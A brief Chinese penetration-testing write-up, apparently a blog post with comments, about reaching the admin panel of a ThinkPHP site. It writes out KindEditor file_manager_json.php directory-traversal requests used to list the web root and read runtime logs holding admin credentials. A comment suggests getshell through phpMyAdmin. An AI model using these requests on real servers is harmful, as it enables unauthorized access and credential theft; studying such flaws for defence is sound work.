记一次目录遍历到后台
ip:xx.xxx.xxx
扫描一下IP 就开了两个端口。一个3389 一个80
打开主页
然后访问钓鱼的页面
/index.php/Home/Index/index/ptm/18/ptbm/53456
随便输入一个地址 发现是一个thinkphp 框架
然后发现图片地址
访问地址
返回发现有一个kineditor kineditoir 里面有一个泄露目录的一个问题。 然后此程序为tp 想着是否可以利用tp 的日志泄露读取一些敏感信息
发现当前是在C盘里面。那么web 目录为phpStudy/WWW/
那么看看这里面有什么
/Public/kindeditor/php/file_manager_json.php?path=phpStudy/WWW/
/Public/kindeditor/php/file_manager_json.php?path=phpStudy/WWW/App/
最终找到log目录为
/Public/kindeditor/php/file_manager_json.php?path=phpStudy/WWW/App/Runtime/Logs/Qwadmin/
然后目录遍历一下
然后在20_06_03 中找到后台管理员账号密码
然后就是找后台了。根据上面tp 路由的方式。那么后台应该就是Qwadmin
然后就是登陆了
后台没有找到getshell 的地方。(猛男落泪)
123
2020年7月28日 上午4:23
找下根目录是否有phpmyadmin,登录进行getshell
whoami
2020年7月31日 下午8:23
哈哈哈哈哈